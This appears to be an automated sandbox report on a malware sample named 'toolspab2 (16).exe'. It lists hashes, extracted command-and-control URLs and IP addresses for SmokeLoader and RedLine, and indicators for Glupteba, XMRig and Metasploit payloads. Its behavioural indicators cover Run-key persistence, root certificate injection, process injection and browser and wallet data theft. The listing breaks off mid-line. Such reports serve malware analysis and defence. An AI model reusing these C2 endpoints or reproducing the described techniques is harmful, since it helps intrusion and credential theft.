Overview
overview
10Static
static
toolspab2 (1).exe
windows7_x64
10toolspab2 (1).exe
windows10_x64
10toolspab2 (10).exe
windows7_x64
10toolspab2 (10).exe
windows10_x64
10toolspab2 (11).exe
windows7_x64
10toolspab2 (11).exe
windows10_x64
10toolspab2 (12).exe
windows7_x64
10toolspab2 (12).exe
windows10_x64
10toolspab2 (13).exe
windows7_x64
10toolspab2 (13).exe
windows10_x64
10toolspab2 (14).exe
windows7_x64
10toolspab2 (14).exe
windows10_x64
10toolspab2 (15).exe
windows7_x64
10toolspab2 (15).exe
windows10_x64
10toolspab2 (16).exe
windows7_x64
10toolspab2 (16).exe
windows10_x64
10toolspab2 (17).exe
windows7_x64
10toolspab2 (17).exe
windows10_x64
10toolspab2 (18).exe
windows7_x64
10toolspab2 (18).exe
windows10_x64
10toolspab2 (19).exe
windows7_x64
10toolspab2 (19).exe
windows10_x64
10toolspab2 (2).exe
windows7_x64
10toolspab2 (2).exe
windows10_x64
10toolspab2 (20).exe
windows7_x64
10toolspab2 (20).exe
windows10_x64
10toolspab2 (21).exe
windows7_x64
10toolspab2 (21).exe
windows10_x64
10toolspab2 (22).exe
windows7_x64
10toolspab2 (22).exe
windows10_x64
10toolspab2 (23).exe
windows7_x64
10toolspab2 (23).exe
windows10_x64
10Resubmissions
12-07-2021 16:55
210712-cvz622xsbj 1010-07-2021 13:25
210710-pdfh7kft96 1009-07-2021 23:00
210709-hewxkm1xlj 1009-07-2021 16:08
210709-5ql27kyjqa 1009-07-2021 14:08
210709-pt977a4bhe 1008-07-2021 22:09
210708-3ypfnj5j7x 1008-07-2021 13:30
210708-4hsk7y9f2x 1008-07-2021 12:14
210708-8t5f9z9egj 10Analysis
-
max time kernel
374s -
max time network
1829s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
09-07-2021 14:08
Static task
static1
Behavioral task
behavioral1
Sample
toolspab2 (1).exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
toolspab2 (1).exe
Resource
win10v20210410
Behavioral task
behavioral3
Sample
toolspab2 (10).exe
Resource
win7v20210410
Behavioral task
behavioral4
Sample
toolspab2 (10).exe
Resource
win10v20210410
Behavioral task
behavioral5
Sample
toolspab2 (11).exe
Resource
win7v20210408
Behavioral task
behavioral6
Sample
toolspab2 (11).exe
Resource
win10v20210410
Behavioral task
behavioral7
Sample
toolspab2 (12).exe
Resource
win7v20210408
Behavioral task
behavioral8
Sample
toolspab2 (12).exe
Resource
win10v20210410
Behavioral task
behavioral9
Sample
toolspab2 (13).exe
Resource
win7v20210410
Behavioral task
behavioral10
Sample
toolspab2 (13).exe
Resource
win10v20210408
Behavioral task
behavioral11
Sample
toolspab2 (14).exe
Resource
win7v20210410
Behavioral task
behavioral12
Sample
toolspab2 (14).exe
Resource
win10v20210408
Behavioral task
behavioral13
Sample
toolspab2 (15).exe
Resource
win7v20210410
Behavioral task
behavioral14
Sample
toolspab2 (15).exe
Resource
win10v20210408
Behavioral task
behavioral15
Sample
toolspab2 (16).exe
Resource
win7v20210410
Behavioral task
behavioral16
Sample
toolspab2 (16).exe
Resource
win10v20210410
Behavioral task
behavioral17
Sample
toolspab2 (17).exe
Resource
win7v20210408
Behavioral task
behavioral18
Sample
toolspab2 (17).exe
Resource
win10v20210410
Behavioral task
behavioral19
Sample
toolspab2 (18).exe
Resource
win7v20210408
Behavioral task
behavioral20
Sample
toolspab2 (18).exe
Resource
win10v20210410
Behavioral task
behavioral21
Sample
toolspab2 (19).exe
Resource
win7v20210408
Behavioral task
behavioral22
Sample
toolspab2 (19).exe
Resource
win10v20210410
Behavioral task
behavioral23
Sample
toolspab2 (2).exe
Resource
win7v20210410
Behavioral task
behavioral24
Sample
toolspab2 (2).exe
Resource
win10v20210408
Behavioral task
behavioral25
Sample
toolspab2 (20).exe
Resource
win7v20210410
Behavioral task
behavioral26
Sample
toolspab2 (20).exe
Resource
win10v20210408
Behavioral task
behavioral27
Sample
toolspab2 (21).exe
Resource
win7v20210410
Behavioral task
behavioral28
Sample
toolspab2 (21).exe
Resource
win10v20210408
Behavioral task
behavioral29
Sample
toolspab2 (22).exe
Resource
win7v20210410
Behavioral task
behavioral30
Sample
toolspab2 (22).exe
Resource
win10v20210408
Behavioral task
behavioral31
Sample
toolspab2 (23).exe
Resource
win7v20210410
Behavioral task
behavioral32
Sample
toolspab2 (23).exe
Resource
win10v20210410
General
-
Target
toolspab2 (16).exe
-
Size
315KB
-
MD5
1d20e1f65938e837ef1b88f10f1bd6c3
-
SHA1
703d7098dbfc476d2181b7fc041cc23e49c368f1
-
SHA256
05cd7440851f13dd8f489bb3c06eba385d85d7d9a77a612049c04c541a88593d
-
SHA512
f9d333abe1f721b8d45d7bc6b5f286af09a8d233bd1d41f0ad891840cf742364aeca2cb6ccd6543f56a8eaf32804f82f72f961d16d5ba663ad706d164915a196
Malware Config
Extracted
smokeloader
2020
http://999080321newfolder1002002131-service1002.space/
http://999080321newfolder1002002231-service1002.space/
http://999080321newfolder3100231-service1002.space/
http://999080321newfolder1002002431-service1002.space/
http://999080321newfolder1002002531-service1002.space/
http://999080321newfolder33417-012425999080321.space/
http://999080321test125831-service10020125999080321.space/
http://999080321test136831-service10020125999080321.space/
http://999080321test147831-service10020125999080321.space/
http://999080321test146831-service10020125999080321.space/
http://999080321test134831-service10020125999080321.space/
http://999080321est213531-service1002012425999080321.ru/
http://999080321yes1t3481-service10020125999080321.ru/
http://999080321test13561-service10020125999080321.su/
http://999080321test14781-service10020125999080321.info/
http://999080321test13461-service10020125999080321.net/
http://999080321test15671-service10020125999080321.tech/
http://999080321test12671-service10020125999080321.online/
http://999080321utest1341-service10020125999080321.ru/
http://999080321uest71-service100201dom25999080321.ru/
http://999080321test61-service10020125999080321.website/
http://999080321test51-service10020125999080321.xyz/
http://999080321test41-service100201pro25999080321.ru/
http://999080321yest31-service100201rus25999080321.ru/
http://999080321rest21-service10020125999080321.eu/
http://999080321test11-service10020125999080321.press/
http://999080321newfolder4561-service10020125999080321.ru/
http://999080321rustest213-service10020125999080321.ru/
http://999080321test281-service10020125999080321.ru/
http://999080321test261-service10020125999080321.space/
http://999080321yomtest251-service10020125999080321.ru/
http://999080321yirtest231-service10020125999080321.ru/
http://nusurtal4f.net/
http://netomishnetojuk.net/
http://escalivrouter.net/
http://nick22doom4.net/
http://wrioshtivsio.su/
http://nusotiso4.su/
http://rickkhtovkka.biz/
http://palisotoliso.net/
Extracted
redline
1
45.32.235.238:45555
Extracted
redline
YTMaloy
87.251.71.125:80
Extracted
metasploit
windows/single_exec
Extracted
redline
82.202.161.37:26317
Signatures
-
Glupteba Payload 2 IoCs
resource yara_rule behavioral15/memory/1636-236-0x0000000002B50000-0x0000000003476000-memory.dmp family_glupteba behavioral15/memory/1636-237-0x0000000000400000-0x0000000000D41000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 8 IoCs
resource yara_rule behavioral15/memory/960-84-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral15/memory/960-85-0x0000000000417E96-mapping.dmp family_redline behavioral15/memory/960-88-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral15/memory/1160-133-0x0000000000417E96-mapping.dmp family_redline behavioral15/memory/1160-132-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral15/memory/1160-135-0x0000000000400000-0x000000000041E000-memory.dmp family_redline behavioral15/memory/2436-268-0x0000000000600000-0x000000000061B000-memory.dmp family_redline behavioral15/memory/2436-273-0x00000000045B0000-0x00000000045C9000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 1 IoCs
resource yara_rule behavioral15/files/0x000400000001317b-254.dat family_socelars -
XMRig Miner Payload 2 IoCs
resource yara_rule behavioral15/memory/2920-287-0x0000000000270000-0x0000000000361000-memory.dmp xmrig behavioral15/memory/2920-291-0x000000000030259C-mapping.dmp xmrig -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 25 IoCs
pid Process 1108 EF3F.exe 1480 F26B.exe 1888 4E60.exe 664 52B5.exe 1140 5564.exe 960 4E60.exe 1004 5E3C.exe 1668 6657.exe 1636 7537.exe 1160 7537.exe 432 ibcdbjh 860 ibcdbjh 752 549E.exe 1852 5FE5.exe 1680 549E.exe 816 75E5.exe 1644 75E5.tmp 1768 U1PwSASbnJZ1Nt2.eXE 2004 134 Vaporeondè_éçè_)))_.exe 1700 549E.exe 1636 B788.exe 1528 C2BF.exe 2160 uowakbcl.exe 2216 F65D.exe 2436 A3C.exe -
Modifies Windows Firewall 1 TTPs
-
Sets service image path in registry 2 TTPs
-
Deletes itself 1 IoCs
pid Process 1208 Process not Found -
Loads dropped DLL 15 IoCs
pid Process 1556 toolspab2 (16).exe 1888 4E60.exe 1668 6657.exe 1636 7537.exe 752 mshta.exe 816 75E5.exe 1636 B788.exe 1644 75E5.tmp 1644 75E5.tmp 1644 75E5.tmp 1700 549E.exe 1644 75E5.tmp 1680 549E.exe 1680 549E.exe 1700 549E.exe -
Modifies file permissions 1 TTPs 1 IoCs
pid Process 464 icacls.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\41132072-636a-459b-8580-589f5110769c\\549E.exe\" --AutoStart" 549E.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 116 api.2ip.ua 120 api.2ip.ua -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1700 549E.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 1852 set thread context of 1556 1852 toolspab2 (16).exe 29 PID 1888 set thread context of 960 1888 4E60.exe 34 PID 1636 set thread context of 1160 1636 7537.exe 45 PID 432 set thread context of 860 432 ibcdbjh 52 PID 752 set thread context of 1680 752 mshta.exe 55 PID 1700 set thread context of 940 1700 549E.exe 82 PID 2160 set thread context of 2360 2160 uowakbcl.exe 96 -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (16).exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (16).exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab2 (16).exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6657.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6657.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 6657.exe -
Kills process with taskkill 2 IoCs
pid Process 1620 taskkill.exe 2648 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies data under HKEY_USERS 2 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Control Panel\Buses svchost.exe Set value (data) \REGISTRY\USER\.DEFAULT\Control Panel\Buses\Config0 = e43b413d88f4f60424edb47d450dd49d084297dce82e72baa49c3cfd5c7f5c1d6b47138b86cd945d24edb47d470dd49d024195daf71261adc06d04fda6e22673bbc9154961cda5691dd4824d7d39e3a5644490bdbc7a20e8905404c4f08d3c74bbc4103d29f8ad681cda8248773ad4f10b4c90d8f6127db9a4583494b48d6c2bd49e440b3cf9a65d579fc2223064b9f8641cc384bc7a22ea955a0cfda8e2377c88f2005469a8946c10d48d4b7434e0a5502d109d954d98e4c63434fdc48d551de4ad035276a6cb2e569bb47d440dd49d642d8521c27151dda46d34fe089f571de4ad750431e3a66c12c3864d7223e6a8542df4bd844d14dda46d34fdc48d541de4ad743d04cd945d24edb47d440dd49d642df4bd844d14dda46d34fdc48d541de4ad74db05cd94 svchost.exe -
description ioc Process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030853000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c00b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 549E.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b00000001000000180000004300b7004f00b7004d00b7004f00b7004400b7004f00000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e 549E.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 F65D.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde F65D.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 549E.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1556 toolspab2 (16).exe 1556 toolspab2 (16).exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 1208 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 1556 toolspab2 (16).exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found 1668 6657.exe 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious use of AdjustPrivilegeToken 43 IoCs
description pid Process Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeDebugPrivilege 1636 7537.exe Token: SeDebugPrivilege 1160 7537.exe Token: SeDebugPrivilege 1620 taskkill.exe Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeShutdownPrivilege 1208 Process not Found Token: SeCreateTokenPrivilege 2216 F65D.exe Token: SeAssignPrimaryTokenPrivilege 2216 F65D.exe Token: SeLockMemoryPrivilege 2216 F65D.exe Token: SeIncreaseQuotaPrivilege 2216 F65D.exe Token: SeMachineAccountPrivilege 2216 F65D.exe Token: SeTcbPrivilege 2216 F65D.exe Token: SeSecurityPrivilege 2216 F65D.exe Token: SeTakeOwnershipPrivilege 2216 F65D.exe Token: SeLoadDriverPrivilege 2216 F65D.exe Token: SeSystemProfilePrivilege 2216 F65D.exe Token: SeSystemtimePrivilege 2216 F65D.exe Token: SeProfSingleProcessPrivilege 2216 F65D.exe Token: SeIncBasePriorityPrivilege 2216 F65D.exe Token: SeCreatePagefilePrivilege 2216 F65D.exe Token: SeCreatePermanentPrivilege 2216 F65D.exe Token: SeBackupPrivilege 2216 F65D.exe Token: SeRestorePrivilege 2216 F65D.exe Token: SeShutdownPrivilege 2216 F65D.exe Token: SeDebugPrivilege 2216 F65D.exe Token: SeAuditPrivilege 2216 F65D.exe Token: SeSystemEnvironmentPrivilege 2216 F65D.exe Token: SeChangeNotifyPrivilege 2216 F65D.exe Token: SeRemoteShutdownPrivilege 2216 F65D.exe Token: SeUndockPrivilege 2216 F65D.exe Token: SeSyncAgentPrivilege 2216 F65D.exe Token: SeEnableDelegationPrivilege 2216 F65D.exe Token: SeManageVolumePrivilege 2216 F65D.exe Token: SeImpersonatePrivilege 2216 F65D.exe Token: SeCreateGlobalPrivilege 2216 F65D.exe Token: 31 2216 F65D.exe Token: 32 2216 F65D.exe Token: 33 2216 F65D.exe Token: 34 2216 F65D.exe Token: 35 2216 F65D.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 1208 Process not Found 1208 Process not Found 1208 Process not Found 1208 Process not Found -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 1108 EF3F.exe 1480 F26B.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1852 wrote to memory of 1556 1852 toolspab2 (16).exe 29 PID 1208 wrote to memory of 1108 1208 Process not Found 30 PID 1208 wrote to memory of 1108 1208 Process not Found 30 PID 1208 wrote to memory of 1108 1208 Process not Found 30 PID 1208 wrote to memory of 1108 1208 Process not Found 30 PID 1208 wrote to memory of 1480 1208 Process not Found 31 PID 1208 wrote to memory of 1480 1208 Process not Found 31 PID 1208 wrote to memory of 1480 1208 Process not Found 31 PID 1208 wrote to memory of 1480 1208 Process not Found 31 PID 1208 wrote to memory of 1888 1208 Process not Found 32 PID 1208 wrote to memory of 1888 1208 Process not Found 32 PID 1208 wrote to memory of 1888 1208 Process not Found 32 PID 1208 wrote to memory of 1888 1208 Process not Found 32 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1208 wrote to memory of 664 1208 Process not Found 35 PID 1208 wrote to memory of 664 1208 Process not Found 35 PID 1208 wrote to memory of 664 1208 Process not Found 35 PID 1208 wrote to memory of 664 1208 Process not Found 35 PID 1208 wrote to memory of 1140 1208 Process not Found 36 PID 1208 wrote to memory of 1140 1208 Process not Found 36 PID 1208 wrote to memory of 1140 1208 Process not Found 36 PID 1208 wrote to memory of 1140 1208 Process not Found 36 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1888 wrote to memory of 960 1888 4E60.exe 34 PID 1208 wrote to memory of 1004 1208 Process not Found 37 PID 1208 wrote to memory of 1004 1208 Process not Found 37 PID 1208 wrote to memory of 1004 1208 Process not Found 37 PID 1208 wrote to memory of 1004 1208 Process not Found 37 PID 1208 wrote to memory of 1668 1208 Process not Found 38 PID 1208 wrote to memory of 1668 1208 Process not Found 38 PID 1208 wrote to memory of 1668 1208 Process not Found 38 PID 1208 wrote to memory of 1668 1208 Process not Found 38 PID 1208 wrote to memory of 1636 1208 Process not Found 39 PID 1208 wrote to memory of 1636 1208 Process not Found 39 PID 1208 wrote to memory of 1636 1208 Process not Found 39 PID 1208 wrote to memory of 1636 1208 Process not Found 39 PID 1208 wrote to memory of 1680 1208 Process not Found 40 PID 1208 wrote to memory of 1680 1208 Process not Found 40 PID 1208 wrote to memory of 1680 1208 Process not Found 40 PID 1208 wrote to memory of 1680 1208 Process not Found 40 PID 1208 wrote to memory of 1680 1208 Process not Found 40 PID 1208 wrote to memory of 1608 1208 Process not Found 41 PID 1208 wrote to memory of 1608 1208 Process not Found 41 PID 1208 wrote to memory of 1608 1208 Process not Found 41 PID 1208 wrote to memory of 1608 1208 Process not Found 41 PID 1208 wrote 